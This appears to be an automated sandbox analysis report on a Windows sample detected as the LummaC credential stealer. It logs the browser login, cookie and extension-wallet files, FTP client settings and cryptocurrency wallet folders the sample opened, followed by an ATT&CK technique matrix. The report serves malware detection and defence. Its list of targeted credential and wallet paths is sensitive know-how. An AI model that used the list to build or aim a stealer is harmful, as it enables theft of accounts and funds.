            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: rdFy6abQ61.exe PID: 3916, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: rdFy6abQ61.exe PID: 3916, type: MEMORYSTR
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		1
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		11
            Security Software Discovery            		Remote Services1
            Screen Capture            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory1
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares41
            Data from Local System            		113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information            		NTDS2
            File and Directory Discovery            		Distributed Component Object Model2
            Clipboard Data            		Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing            		LSA Secrets22
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

